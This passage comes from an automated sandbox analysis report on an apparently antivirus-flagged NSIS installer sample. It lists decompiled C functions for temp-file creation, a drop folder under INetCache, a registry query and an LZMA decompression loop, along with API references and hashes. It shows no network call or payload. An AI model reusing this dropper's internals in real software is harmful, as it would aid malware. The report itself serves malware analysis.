                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxD40A.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseValuelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp
                                                                                                                          • API String ID: 2655323295-2712235536
                                                                                                                          • Opcode ID: 869cac94e4e8d64105071562aef37547e1d0e6704b8d592739bde5329dac9b0e
                                                                                                                          • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                                                                                                          • Opcode Fuzzy Hash: 869cac94e4e8d64105071562aef37547e1d0e6704b8d592739bde5329dac9b0e
                                                                                                                          • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 764 406187-406193 765 406194-4061c8 GetTickCount GetTempFileNameW 764->765 766 4061d7-4061d9 765->766 767 4061ca-4061cc 765->767 769 4061d1-4061d4 766->769 767->765 768 4061ce 767->768 768->769
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				short _v12;
                                                                                                                          				short _t12;
                                                                                                                          				intOrPtr _t13;
                                                                                                                          				signed int _t14;
                                                                                                                          				WCHAR* _t17;
                                                                                                                          				signed int _t19;
                                                                                                                          				signed short _t23;
                                                                                                                          				WCHAR* _t26;
                                                                                                                          
                                                                                                                          				_t26 = _a4;
                                                                                                                          				_t23 = 0x64;
                                                                                                                          				while(1) {
                                                                                                                          					_t12 =  *L"nsa"; // 0x73006e
                                                                                                                          					_t23 = _t23 - 1;
                                                                                                                          					_v12 = _t12;
                                                                                                                          					_t13 =  *0x40a5ac; // 0x61
                                                                                                                          					_v8 = _t13;
                                                                                                                          					_t14 = GetTickCount();
                                                                                                                          					_t19 = 0x1a;
                                                                                                                          					_v8 = _v8 + _t14 % _t19;
                                                                                                                          					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                                                          					if(_t17 != 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					if(_t23 != 0) {
                                                                                                                          						continue;
                                                                                                                          					} else {
                                                                                                                          						 *_t26 =  *_t26 & _t23;
                                                                                                                          					}
                                                                                                                          					L4:
                                                                                                                          					return _t17;
                                                                                                                          				}
                                                                                                                          				_t17 = _t26;
                                                                                                                          				goto L4;
                                                                                                                          			}












                                                                                                                          0x0040618d
                                                                                                                          0x00406193
                                                                                                                          0x00406194
                                                                                                                          0x00406194
                                                                                                                          0x00406199
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a2
                                                                                                                          0x004061a5
                                                                                                                          0x004061af
                                                                                                                          0x004061bc
                                                                                                                          0x004061c0
                                                                                                                          0x004061c8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061cc
                                                                                                                          0x00000000
                                                                                                                          0x004061ce
                                                                                                                          0x004061ce
                                                                                                                          0x004061ce
                                                                                                                          0x004061d1
                                                                                                                          0x004061d4
                                                                                                                          0x004061d4
                                                                                                                          0x004061d7
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 004061A5
                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                          • API String ID: 1716503409-944333549
                                                                                                                          • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                                                          • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                                                          • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                                                          • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E004015C1(short __ebx, void* __eflags) {
                                                                                                                          				void* _t17;
                                                                                                                          				int _t23;
                                                                                                                          				void* _t25;
                                                                                                                          				signed char _t26;
                                                                                                                          				short _t28;
                                                                                                                          				short _t31;
                                                                                                                          				short* _t34;
                                                                                                                          				void* _t36;
                                                                                                                          
                                                                                                                          				_t28 = __ebx;
                                                                                                                          				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                                                                          				_t17 = E00405FE2(_t16);
                                                                                                                          				_t32 = _t17;
                                                                                                                          				if(_t17 != __ebx) {
                                                                                                                          					do {
                                                                                                                          						_t34 = E00405F64(_t32, 0x5c);
                                                                                                                          						_t31 =  *_t34;
                                                                                                                          						 *_t34 = _t28;
                                                                                                                          						if(_t31 != _t28) {
                                                                                                                          							L5:
                                                                                                                          							_t25 = E00405C16( *(_t36 + 8));
                                                                                                                          						} else {
                                                                                                                          							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                                                          							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                                                                                          								goto L5;
                                                                                                                          							} else {
                                                                                                                          								_t25 = E00405B99( *(_t36 + 8)); // executed
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t25 != _t28) {
                                                                                                                          							if(_t25 != 0xb7) {
                                                                                                                          								L9:
                                                                                                                          								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                          							} else {
                                                                                                                          								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                                                          								if((_t26 & 0x00000010) == 0) {
                                                                                                                          									goto L9;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						 *_t34 = _t31;
                                                                                                                          						_t32 = _t34 + 2;
                                                                                                                          					} while (_t31 != _t28);
                                                                                                                          				}
                                                                                                                          				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                                                          					_push(0xfffffff5);
                                                                                                                          					E00401423();
                                                                                                                          				} else {
                                                                                                                          					E00401423(0xffffffe6);
                                                                                                                          					E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology",  *(_t36 + 8));
                                                                                                                          					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                                                          					if(_t23 == 0) {
                                                                                                                          						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}











                                                                                                                          0x004015c1
                                                                                                                          0x004015c9
                                                                                                                          0x004015cc
                                                                                                                          0x004015d1
                                                                                                                          0x004015d5
                                                                                                                          0x004015d7
                                                                                                                          0x004015df
                                                                                                                          0x004015e1
                                                                                                                          0x004015e4
                                                                                                                          0x004015ea
                                                                                                                          0x00401604
                                                                                                                          0x00401607
                                                                                                                          0x004015ec
                                                                                                                          0x004015ec
                                                                                                                          0x004015ef
                                                                                                                          0x00000000
                                                                                                                          0x004015fa
                                                                                                                          0x004015fd
                                                                                                                          0x004015fd
                                                                                                                          0x004015ef
                                                                                                                          0x0040160e
                                                                                                                          0x00401615
                                                                                                                          0x00401624
                                                                                                                          0x00401624
                                                                                                                          0x00401617
                                                                                                                          0x0040161a
                                                                                                                          0x00401622
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00401622
                                                                                                                          0x00401615
                                                                                                                          0x00401627
                                                                                                                          0x0040162b
                                                                                                                          0x0040162c
                                                                                                                          0x004015d7
                                                                                                                          0x00401634
                                                                                                                          0x00401663
                                                                                                                          0x004022f1
                                                                                                                          0x00401636
                                                                                                                          0x00401638
                                                                                                                          0x00401645
                                                                                                                          0x0040164d
                                                                                                                          0x00401655
                                                                                                                          0x0040165b
                                                                                                                          0x0040165b
                                                                                                                          0x00401655
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,75AA3420,?,75AA2EE0,00405D94,?,75AA3420,75AA2EE0,00000000), ref: 00405FF0
                                                                                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                            • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology,?,00000000,000000F0), ref: 0040164D
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology, xrefs: 00401640
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology
                                                                                                                          • API String ID: 1892508949-3859282073
                                                                                                                          • Opcode ID: 898851454d7eee2209e77e7ac52344011014fdf000c4c2aa4691126d19efa21b
                                                                                                                          • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                                                          • Opcode Fuzzy Hash: 898851454d7eee2209e77e7ac52344011014fdf000c4c2aa4691126d19efa21b
                                                                                                                          • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00406536(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                                                          				int _v8;
                                                                                                                          				long _t21;
                                                                                                                          				long _t24;
                                                                                                                          				char* _t30;
                                                                                                                          
                                                                                                                          				asm("sbb eax, eax");
                                                                                                                          				_v8 = 0x800;
                                                                                                                          				_t21 = E004064D5(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                                                          				_t30 = _a16;
                                                                                                                          				if(_t21 != 0) {
                                                                                                                          					L4:
                                                                                                                          					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                          				} else {
                                                                                                                          					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                                                                                          					_t21 = RegCloseKey(_a20);
                                                                                                                          					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                                                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                          						goto L4;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t21;
                                                                                                                          			}







                                                                                                                          0x00406544
                                                                                                                          0x00406546
                                                                                                                          0x0040655e
                                                                                                                          0x00406563
                                                                                                                          0x00406568
                                                                                                                          0x004065a6
                                                                                                                          0x004065a6
                                                                                                                          0x0040656a
                                                                                                                          0x0040657c
                                                                                                                          0x00406587
                                                                                                                          0x0040658d
                                                                                                                          0x00406598
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406598
                                                                                                                          0x004065ac

                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll), ref: 00406587
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseQueryValue
                                                                                                                          • String ID: Call
                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                          • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                          • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 99%
                                                                                                                          			E00407194() {
                                                                                                                          				signed int _t530;
                                                                                                                          				void _t537;
                                                                                                                          				signed int _t538;
                                                                                                                          				signed int _t539;
                                                                                                                          				unsigned short _t569;
                                                                                                                          				signed int _t579;
                                                                                                                          				signed int _t607;
                                                                                                                          				void* _t627;
                                                                                                                          				signed int _t628;
                                                                                                                          				signed int _t635;
                                                                                                                          				signed int* _t643;
                                                                                                                          				void* _t644;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					_t530 =  *(_t644 - 0x30);
                                                                                                                          					if(_t530 >= 4) {
                                                                                                                          					}
                                                                                                                          					 *(_t644 - 0x40) = 6;
                                                                                                                          					 *(_t644 - 0x7c) = 0x19;
                                                                                                                          					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                                                          					while(1) {
                                                                                                                          						L145:
                                                                                                                          						 *(_t644 - 0x50) = 1;
                                                                                                                          						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                          						while(1) {
                                                                                                                          							L149:
                                                                                                                          							if( *(_t644 - 0x48) <= 0) {
                                                                                                                          								goto L155;
                                                                                                                          							}
                                                                                                                          							L150:
                                                                                                                          							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                                                          							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                                                          							 *(_t644 - 0x54) = _t643;
                                                                                                                          							_t569 =  *_t643;
                                                                                                                          							_t635 = _t569 & 0x0000ffff;
                                                                                                                          							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                                                          							if( *(_t644 - 0xc) >= _t607) {
                                                                                                                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                                                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                                                          								_t628 = _t627 + 1;
                                                                                                                          								 *_t643 = _t569 - (_t569 >> 5);
                                                                                                                          								 *(_t644 - 0x50) = _t628;
                                                                                                                          							} else {
                                                                                                                          								 *(_t644 - 0x10) = _t607;
                                                                                                                          								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                                                          								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                                                          							}
                                                                                                                          							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                          								L148:
                                                                                                                          								_t487 = _t644 - 0x48;
                                                                                                                          								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                                                          								L149:
                                                                                                                          								if( *(_t644 - 0x48) <= 0) {
                                                                                                                          									goto L155;
                                                                                                                          								}
                                                                                                                          								goto L150;
                                                                                                                          							} else {
                                                                                                                          								L154:
                                                                                                                          								L146:
                                                                                                                          								if( *(_t644 - 0x6c) == 0) {
                                                                                                                          									L169:
                                                                                                                          									 *(_t644 - 0x88) = 0x18;
                                                                                                                          									L170:
                                                                                                                          									_t579 = 0x22;
                                                                                                                          									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                                                          									_t539 = 0;
                                                                                                                          									L172:
                                                                                                                          									return _t539;
                                                                                                                          								}
                                                                                                                          								L147:
                                                                                                                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                          								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                          								_t484 = _t644 - 0x70;
                                                                                                                          								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                          								goto L148;
                                                                                                                          							}
                                                                                                                          							L155:
                                                                                                                          							_t537 =  *(_t644 - 0x7c);
                                                                                                                          							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                                                          							while(1) {
                                                                                                                          								L140:
                                                                                                                          								 *(_t644 - 0x88) = _t537;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t538 =  *(_t644 - 0x88);
                                                                                                                          									if(_t538 > 0x1c) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									L2:
                                                                                                                          									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                                                                                          										case 0:
                                                                                                                          											L3:
                                                                                                                          											if( *(_t644 - 0x6c) == 0) {
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L4:
                                                                                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                          											_t538 =  *( *(_t644 - 0x70));
                                                                                                                          											if(_t538 > 0xe1) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											L5:
                                                                                                                          											_t542 = _t538 & 0x000000ff;
                                                                                                                          											_push(0x2d);
                                                                                                                          											asm("cdq");
                                                                                                                          											_pop(_t581);
                                                                                                                          											_push(9);
                                                                                                                          											_pop(_t582);
                                                                                                                          											_t638 = _t542 / _t581;
                                                                                                                          											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                                                          											asm("cdq");
                                                                                                                          											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                                                          											 *(_t644 - 0x3c) = _t633;
                                                                                                                          											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                                                          											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                                                          											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                                                          											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                                                          												L10:
                                                                                                                          												if(_t641 == 0) {
                                                                                                                          													L12:
                                                                                                                          													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                                                          													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                          													goto L15;
                                                                                                                          												} else {
                                                                                                                          													goto L11;
                                                                                                                          												}
                                                                                                                          												do {
                                                                                                                          													L11:
                                                                                                                          													_t641 = _t641 - 1;
                                                                                                                          													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                                                          												} while (_t641 != 0);
                                                                                                                          												goto L12;
                                                                                                                          											}
                                                                                                                          											L6:
                                                                                                                          											if( *(_t644 - 4) != 0) {
                                                                                                                          												GlobalFree( *(_t644 - 4));
                                                                                                                          											}
                                                                                                                          											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          											 *(_t644 - 4) = _t538;
                                                                                                                          											if(_t538 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                                                          												goto L10;
                                                                                                                          											}
                                                                                                                          										case 1:
                                                                                                                          											L13:
                                                                                                                          											__eflags =  *(_t644 - 0x6c);
                                                                                                                          											if( *(_t644 - 0x6c) == 0) {
                                                                                                                          												L157:
                                                                                                                          												 *(_t644 - 0x88) = 1;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L14:
                                                                                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                          											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                          											_t45 = _t644 - 0x48;
                                                                                                                          											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                                                          											__eflags =  *_t45;
                                                                                                                          											L15:
                                                                                                                          											if( *(_t644 - 0x48) < 4) {
                                                                                                                          												goto L13;
                                                                                                                          											}
                                                                                                                          											L16:
                                                                                                                          											_t550 =  *(_t644 - 0x40);
                                                                                                                          											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                                                          												L20:
                                                                                                                          												 *(_t644 - 0x48) = 5;
                                                                                                                          												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                                                          												goto L23;
                                                                                                                          											}
                                                                                                                          											L17:
                                                                                                                          											 *(_t644 - 0x74) = _t550;
                                                                                                                          											if( *(_t644 - 8) != 0) {
                                                                                                                          												GlobalFree( *(_t644 - 8));
                                                                                                                          											}
                                                                                                                          											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                                                          											 *(_t644 - 8) = _t538;
                                                                                                                          											if(_t538 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												goto L20;
                                                                                                                          											}
                                                                                                                          										case 2:
                                                                                                                          											L24:
                                                                                                                          											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                                                          											 *(_t644 - 0x84) = 6;
                                                                                                                          											 *(_t644 - 0x4c) = _t557;
                                                                                                                          											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                                                          											goto L132;
                                                                                                                          										case 3:
                                                                                                                          											L21:
                                                                                                                          											__eflags =  *(_t644 - 0x6c);
                                                                                                                          											if( *(_t644 - 0x6c) == 0) {
                                                                                                                          												L158:
                                                                                                                          												 *(_t644 - 0x88) = 3;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L22:
                                                                                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                          											_t67 = _t644 - 0x70;
                                                                                                                          											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                          											__eflags =  *_t67;
                                                                                                                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                          											L23:
                                                                                                                          											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                                                          											if( *(_t644 - 0x48) != 0) {
                                                                                                                          												goto L21;
                                                                                                                          											}
                                                                                                                          											goto L24;
                                                                                                                          										case 4:
                                                                                                                          											L133:
                                                                                                                          											_t559 =  *_t642;
                                                                                                                          											_t626 = _t559 & 0x0000ffff;
                                                                                                                          											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                                                          											if( *(_t644 - 0xc) >= _t596) {
                                                                                                                          												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                                                          												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                                                          												 *(_t644 - 0x40) = 1;
                                                                                                                          												_t560 = _t559 - (_t559 >> 5);
                                                                                                                          												__eflags = _t560;
                                                                                                                          												 *_t642 = _t560;
                                                                                                                          											} else {
                                                                                                                          												 *(_t644 - 0x10) = _t596;
                                                                                                                          												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                          												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                                                          											}
                                                                                                                          											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                          												goto L139;
                                                                                                                          											} else {
                                                                                                                          												goto L137;
                                                                                                                          											}
                                                                                                                          										case 5:
                                                                                                                          											L137:
                                                                                                                          											if( *(_t644 - 0x6c) == 0) {
                                                                                                                          												L168:
                                                                                                                          												 *(_t644 - 0x88) = 5;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L138:
                                                                                                                          											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
